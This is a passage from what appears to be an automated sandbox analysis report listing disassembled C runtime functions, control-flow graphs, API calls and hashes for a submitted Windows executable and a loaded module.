                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: c89844b37421d08347d19d08b8332118becdfa9e47572e0395efcd425b97edb5
                                                                                                                                                                              • Instruction ID: bf358dcc17627888b7380c6ccbb5722cfbbe6382d0900956bf909bf9a14ec944
                                                                                                                                                                              • Opcode Fuzzy Hash: c89844b37421d08347d19d08b8332118becdfa9e47572e0395efcd425b97edb5
                                                                                                                                                                              • Instruction Fuzzy Hash: 09513075A502068FCF09CEBCC5953FE77F2AB42324F10D919D425D7B64C62A8B098B52
                                                                                                                                                                              Function 6D5C7EC0 Relevance: .2, Instructions: 166COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0a2a989656ed4afe3d8426f59127208e649e67c1b57c17307773b4dd863a5987
                                                                                                                                                                              • Instruction ID: 9290cdd1cef3d1c370bc8d1d5f9338b060ef2750e0b839ec2e1014e970a00dc8
                                                                                                                                                                              • Opcode Fuzzy Hash: 0a2a989656ed4afe3d8426f59127208e649e67c1b57c17307773b4dd863a5987
                                                                                                                                                                              • Instruction Fuzzy Hash: 0351E436E541068FCB09DEFCC6D13EE7BF2AF42355F10C819D415EBB51C62A9A098B86
                                                                                                                                                                              Function 6D5C7110 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: cbb3c539e91ba1ee62b0781047ae0108920de02bdbbe64ab5ff9ea80da172911
                                                                                                                                                                              • Instruction ID: 57f6eac1488715b3de8fc5565f1e45eadc2aad7e3f75aca96d7ea5abf8cff533
                                                                                                                                                                              • Opcode Fuzzy Hash: cbb3c539e91ba1ee62b0781047ae0108920de02bdbbe64ab5ff9ea80da172911
                                                                                                                                                                              • Instruction Fuzzy Hash: D041D375E502068FCF0DCEACC8957EF7BF1AB46320F10861DD821ABB90C23A4509CB92
                                                                                                                                                                              Function 6D5C2C00 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: c34d7dd1e7a5170e144a6a9fe4ce8984384ee10ee6007a8cfcae9247f0176890
                                                                                                                                                                              • Instruction ID: d3d8715d58c4a57fc2839e4e341f02a64dd1b24588b18a9f13240186bf4f6245
                                                                                                                                                                              • Opcode Fuzzy Hash: c34d7dd1e7a5170e144a6a9fe4ce8984384ee10ee6007a8cfcae9247f0176890
                                                                                                                                                                              • Instruction Fuzzy Hash: 1F414772E415068FDF18DEECC4953EF3BF1AB52320F10AC2DD4219B795D62A850A8B82
                                                                                                                                                                              Function 6D5C4060 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: e55276ed864785f39a79e6dfbe191bdeb763cca80d9e93c123a3ae636ad1ca59
                                                                                                                                                                              • Instruction ID: 224e225b8e4238a9fc9ef2d23a353fdeaa24985961e672848701c5efd4a7a444
                                                                                                                                                                              • Opcode Fuzzy Hash: e55276ed864785f39a79e6dfbe191bdeb763cca80d9e93c123a3ae636ad1ca59
                                                                                                                                                                              • Instruction Fuzzy Hash: 8B413B769905124FCF0CCABCC5957EF7BF2AB5A325F10D51CC421AB791C22B690ACB42
                                                                                                                                                                              Function 6D5D0C7A Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1707 6d5d0c7a-6d5d0ca5 call 6d5d17c9 1710 6d5d1019-6d5d101e call 6d5d2aeb 1707->1710 1711 6d5d0cab-6d5d0cae 1707->1711 1711->1710 1713 6d5d0cb4-6d5d0cbd 1711->1713 1715 6d5d0dba-6d5d0dc0 1713->1715 1716 6d5d0cc3-6d5d0cc7 1713->1716 1717 6d5d0dc8-6d5d0dd6 1715->1717 1716->1715 1718 6d5d0ccd-6d5d0cd4 1716->1718 1719 6d5d0ddc-6d5d0de0 1717->1719 1720 6d5d0f82-6d5d0f85 1717->1720 1721 6d5d0cec-6d5d0cf1 1718->1721 1722 6d5d0cd6-6d5d0cdd 1718->1722 1719->1720 1727 6d5d0de6-6d5d0ded 1719->1727 1724 6d5d0fa8-6d5d0fb1 call 6d5d02be 1720->1724 1725 6d5d0f87-6d5d0f8a 1720->1725 1721->1715 1726 6d5d0cf7-6d5d0cff call 6d5d02be 1721->1726 1722->1721 1723 6d5d0cdf-6d5d0ce6 1722->1723 1723->1715 1723->1721 1724->1710 1741 6d5d0fb3-6d5d0fb7 1724->1741 1725->1710 1728 6d5d0f90-6d5d0fa5 call 6d5d101f 1725->1728 1740 6d5d0d05-6d5d0d1e call 6d5d02be * 2 1726->1740 1726->1741 1730 6d5d0def-6d5d0df6 1727->1730 1731 6d5d0e05-6d5d0e0b 1727->1731 1728->1724 1730->1731 1735 6d5d0df8-6d5d0dff 1730->1735 1736 6d5d0e11-6d5d0e38 call 6d5d0453 1731->1736 1737 6d5d0f22-6d5d0f26 1731->1737 1735->1720 1735->1731 1736->1737 1753 6d5d0e3e-6d5d0e41 1736->1753 1743 6d5d0f28-6d5d0f31 call 6d5cff2e 1737->1743 1744 6d5d0f32-6d5d0f3e 1737->1744 1740->1710 1766 6d5d0d24-6d5d0d2a 1740->1766 1743->1744 1744->1724 1746 6d5d0f40-6d5d0f4a 1744->1746 1750 6d5d0f4c-6d5d0f4e 1746->1750 1751 6d5d0f58-6d5d0f5a 1746->1751 1750->1724 1754 6d5d0f50-6d5d0f54 1750->1754 1755 6d5d0f5c-6d5d0f6f call 6d5d02be * 2 1751->1755 1756 6d5d0f71-6d5d0f7e call 6d5d1698 1751->1756 1758 6d5d0e44-6d5d0e59 1753->1758 1754->1724 1759 6d5d0f56 1754->1759 1785 6d5d0fb8 call 6d5d2a55 1755->1785 1770 6d5d0fdd-6d5d0ff2 call 6d5d02be * 2 1756->1770 1771 6d5d0f80 1756->1771 1762 6d5d0e5f-6d5d0e62 1758->1762 1763 6d5d0f03-6d5d0f16 1758->1763 1759->1755 1762->1763 1768 6d5d0e68-6d5d0e70 1762->1768 1763->1758 1767 6d5d0f1c-6d5d0f1f 1763->1767 1773 6d5d0d2c-6d5d0d30 1766->1773 1774 6d5d0d56-6d5d0d5e call 6d5d02be 1766->1774 1767->1737 1768->1763 1775 6d5d0e76-6d5d0e8a 1768->1775 1803 6d5d0ff4 1770->1803 1804 6d5d0ff7-6d5d1014 call 6d5d063f call 6d5d1598 call 6d5d1755 call 6d5d150f 1770->1804 1771->1724 1773->1774 1780 6d5d0d32-6d5d0d39 1773->1780 1789 6d5d0d60-6d5d0d80 call 6d5d02be * 2 call 6d5d1698 1774->1789 1790 6d5d0dc2-6d5d0dc5 1774->1790 1776 6d5d0e8d-6d5d0e9e 1775->1776 1781 6d5d0ec4-6d5d0ed1 1776->1781 1782 6d5d0ea0-6d5d0eb1 call 6d5d1155 1776->1782 1786 6d5d0d4d-6d5d0d50 1780->1786 1787 6d5d0d3b-6d5d0d42 1780->1787 1781->1776 1792 6d5d0ed3 1781->1792 1800 6d5d0ed5-6d5d0efd call 6d5d0bfa 1782->1800 1801 6d5d0eb3-6d5d0ebc 1782->1801 1799 6d5d0fbd-6d5d0fd8 call 6d5cff2e call 6d5d1309 call 6d5ce574 1785->1799 1786->1710 1786->1774 1787->1786 1794 6d5d0d44-6d5d0d4b 1787->1794 1789->1790 1821 6d5d0d82-6d5d0d87 1789->1821 1790->1717 1798 6d5d0f00 1792->1798 1794->1774 1794->1786 1798->1763 1799->1770 1800->1798 1801->1782 1806 6d5d0ebe-6d5d0ec1 1801->1806 1803->1804 1804->1710 1806->1781 1821->1785 1823 6d5d0d8d-6d5d0da0 call 6d5d1321 1821->1823 1823->1799 1828 6d5d0da6-6d5d0db2 1823->1828 1828->1785 1829 6d5d0db8 1828->1829 1829->1823
                                                                                                                                                                              APIs
                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 6D5D0D99
                                                                                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 6D5D0EA7
                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 6D5D0FF9
                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 6D5D1014
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                              • API String ID: 2751267872-393685449
                                                                                                                                                                              • Opcode ID: b6c5e36e008126a86077b551a8d860f7b1df6954ca7db4746c335883b0b4f8e1
                                                                                                                                                                              • Instruction ID: 9b7847d3568fe60f3ed05aef8806eba4e1a8e809714a60023dc69593856583fa
                                                                                                                                                                              • Opcode Fuzzy Hash: b6c5e36e008126a86077b551a8d860f7b1df6954ca7db4746c335883b0b4f8e1
                                                                                                                                                                              • Instruction Fuzzy Hash: 6DB19E7180420AEFCF99DFAEC8409AEB7B5FF44315B11495BE9106BA15C330EA51CFA9
                                                                                                                                                                              Function 6D5D4C3F Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1830 6d5d4c3f-6d5d4c4b 1831 6d5d4cdd-6d5d4ce0 1830->1831 1832 6d5d4ce6 1831->1832 1833 6d5d4c50-6d5d4c61 1831->1833 1834 6d5d4ce8-6d5d4cec 1832->1834 1835 6d5d4c6e-6d5d4c87 LoadLibraryExW 1833->1835 1836 6d5d4c63-6d5d4c66 1833->1836 1839 6d5d4ced-6d5d4cfd 1835->1839 1840 6d5d4c89-6d5d4c92 GetLastError 1835->1840 1837 6d5d4c6c 1836->1837 1838 6d5d4d06-6d5d4d08 1836->1838 1842 6d5d4cda 1837->1842 1838->1834 1839->1838 1841 6d5d4cff-6d5d4d00 FreeLibrary 1839->1841 1843 6d5d4ccb-6d5d4cd8 1840->1843 1844 6d5d4c94-6d5d4ca6 call 6d5d2c13 1840->1844 1841->1838 1842->1831 1843->1842 1844->1843 1847 6d5d4ca8-6d5d4cba call 6d5d2c13 1844->1847 1847->1843 1850 6d5d4cbc-6d5d4cc9 LoadLibraryExW 1847->1850 1850->1839 1850->1843
                                                                                                                                                                              APIs
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,6D5D4EC7,00000022,FlsSetValue,6D5DD390,6D5DD398,00000000,?,6D5D3140,FFFFFFFF,000000FF,?,6D5D2848,00000000,00000000), ref: 6D5D4D00
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                              • String ID: H(]m$api-ms-$ext-ms-
                                                                                                                                                                              • API String ID: 3664257935-3134889710
                                                                                                                                                                              • Opcode ID: 584e60fe8648954251d7ce989f3c10b495bdd4ecb61663246bd421cf12295601
                                                                                                                                                                              • Instruction ID: 32bbc1f20078306c01eb9582fbb5c1b493fcecaaa5ed765d5a9ca286a461b1b1
                                                                                                                                                                              • Opcode Fuzzy Hash: 584e60fe8648954251d7ce989f3c10b495bdd4ecb61663246bd421cf12295601
                                                                                                                                                                              • Instruction Fuzzy Hash: FB213D31940212A7CB59EB6DCC41B6A3778AF46764F114914E925E7A90F730ED00C6F8
                                                                                                                                                                              Function 6D5D02CC Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1851 6d5d02cc-6d5d02d3 1852 6d5d02d8-6d5d02f3 GetLastError call 6d5d0963 1851->1852 1853 6d5d02d5-6d5d02d7 1851->1853 1856 6d5d030c-6d5d030e 1852->1856 1857 6d5d02f5-6d5d02f7 1852->1857 1858 6d5d0352-6d5d035d SetLastError 1856->1858 1857->1858 1859 6d5d02f9-6d5d030a call 6d5d099e 1857->1859 1859->1856 1862 6d5d0310-6d5d0320 call 6d5d2c08 1859->1862 1865 6d5d0334-6d5d0344 call 6d5d099e 1862->1865 1866 6d5d0322-6d5d0332 call 6d5d099e 1862->1866 1872 6d5d034a-6d5d0351 call 6d5d1d43 1865->1872 1866->1865 1871 6d5d0346-6d5d0348 1866->1871 1871->1872 1872->1858
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(00000001,?,6D5CFF01,6D5CD7D8,6D5CD19F,?,6D5CD3D7,?,00000001,?,?,00000001,?,6D5E0DC8,0000000C,6D5CD4D0), ref: 6D5D02DA
                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D5D02E8
                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D5D0301
                                                                                                                                                                              • SetLastError.KERNEL32(00000000,6D5CD3D7,?,00000001,?,?,00000001,?,6D5E0DC8,0000000C,6D5CD4D0,?,00000001,?), ref: 6D5D0353
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                              • Opcode ID: a54b9116ff218bfd430d7881789dc4e358f385342a8026a2c97e1e5a1a82ae72
                                                                                                                                                                              • Instruction ID: 8defbd5121c8ae6acb43594f77b644659bd45d2d5ef0ebdaed497fb161ebc110
                                                                                                                                                                              • Opcode Fuzzy Hash: a54b9116ff218bfd430d7881789dc4e358f385342a8026a2c97e1e5a1a82ae72
                                                                                                                                                                              • Instruction Fuzzy Hash: 7E01B93210D3129FEBBC2B7F6C8475A27A5E7467B5725872BE61096CD0EB514C818178
                                                                                                                                                                              Function 6D5D3E73 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1875 6d5d3e73-6d5d3e7e 1876 6d5d3e8f-6d5d3e95 1875->1876 1877 6d5d3e80-6d5d3e8a call 6d5d3f5c 1875->1877 1878 6d5d3ebc-6d5d3ed1 call 6d5d4a41 1876->1878 1879 6d5d3e97-6d5d3e9d 1876->1879 1885 6d5d3f32-6d5d3f34 1877->1885 1890 6d5d3ee9-6d5d3ef0 1878->1890 1891 6d5d3ed3-6d5d3ee7 GetLastError call 6d5d34f9 call 6d5d3553 1878->1891 1882 6d5d3e9f-6d5d3eaa call 6d5d3f35 1879->1882 1883 6d5d3eb0-6d5d3eba 1879->1883 1882->1883 1887 6d5d3f31 1882->1887 1883->1887 1887->1885 1892 6d5d3efe-6d5d3f12 call 6d5d3cca 1890->1892 1893 6d5d3ef2-6d5d3efc call 6d5d3f35 1890->1893 1891->1887 1902 6d5d3f2a-6d5d3f2e 1892->1902 1903 6d5d3f14-6d5d3f28 GetLastError call 6d5d34f9 call 6d5d3553 1892->1903 1893->1892 1901 6d5d3f30 1893->1901 1901->1887 1902->1901 1903->1901
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\Users\user\Desktop\file.exe, xrefs: 6D5D3E8F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: C:\Users\user\Desktop\file.exe
                                                                                                                                                                              • API String ID: 0-1639720508
                                                                                                                                                                              • Opcode ID: 7f17788d335a16d4725f9dfd4aa775bcb3a02ce6e3068c408d4fe3949ab205de
                                                                                                                                                                              • Instruction ID: 309a930de119aee3ef363c2b9ea78dab6f12a6e39805fbc5117b885253509bd9
                                                                                                                                                                              • Opcode Fuzzy Hash: 7f17788d335a16d4725f9dfd4aa775bcb3a02ce6e3068c408d4fe3949ab205de
                                                                                                                                                                              • Instruction Fuzzy Hash: 8D21A43161820BAFAB899F6DC840A6A77B9EF813687058919E919D7940DB34EC0087B8
                                                                                                                                                                              Function 6D5D2176 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 1909 6d5d2176-6d5d21b3 GetModuleHandleExW 1910 6d5d21b5-6d5d21c7 GetProcAddress 1909->1910 1911 6d5d21d6-6d5d21da 1909->1911 1910->1911 1912 6d5d21c9-6d5d21d4 1910->1912 1913 6d5d21dc-6d5d21df FreeLibrary 1911->1913 1914 6d5d21e5-6d5d21f2 1911->1914 1912->1911 1913->1914
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6E8FD2E3,00000000,?,00000000,6D5DA5C2,000000FF,?,6D5D2110,?,?,6D5D20E4,?), ref: 6D5D21AB
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D5D21BD
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,6D5DA5C2,000000FF,?,6D5D2110,?,?,6D5D20E4,?), ref: 6D5D21DF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                              • Opcode ID: 2aa1393ea7ec312405fa79c05d9d2548b61e16e3be5cc9f1f7dbc5f2993dd347
                                                                                                                                                                              • Instruction ID: a00f0b3d914794da75564a145e7ad428ed8bc55cc3dcff49a9651f509b882f43
                                                                                                                                                                              • Opcode Fuzzy Hash: 2aa1393ea7ec312405fa79c05d9d2548b61e16e3be5cc9f1f7dbc5f2993dd347
                                                                                                                                                                              • Instruction Fuzzy Hash: 6001623190055AEFDF159F98CC08BBEBBB9FB09751F014529E821E2A90DB749900CBB8
                                                                                                                                                                              Function 6D5D69F4 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 6D5D6A79
                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 6D5D6B42
                                                                                                                                                                              • __freea.LIBCMT ref: 6D5D6BA9
                                                                                                                                                                                • Part of subcall function 6D5D33E2: HeapAlloc.KERNEL32(00000000,6D5D43EC,?,?,6D5D43EC,00000220,?,00000000,?), ref: 6D5D3414
                                                                                                                                                                              • __freea.LIBCMT ref: 6D5D6BBC
                                                                                                                                                                              • __freea.LIBCMT ref: 6D5D6BC9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
